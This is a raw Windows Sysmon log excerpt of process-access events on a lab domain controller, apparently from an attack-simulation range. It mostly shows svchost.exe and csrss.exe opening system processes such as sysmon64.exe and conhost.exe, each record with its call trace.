13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9027-6005-1401-00000000A301}4776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9027-6005-1301-00000000A301}4804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9027-6005-1101-00000000A301}3028C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1101-00000000A301}3028C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 